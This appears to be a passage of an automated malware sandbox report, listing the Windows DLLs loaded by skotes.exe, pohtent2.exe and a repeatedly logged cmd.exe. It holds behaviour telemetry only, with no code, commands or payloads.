Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
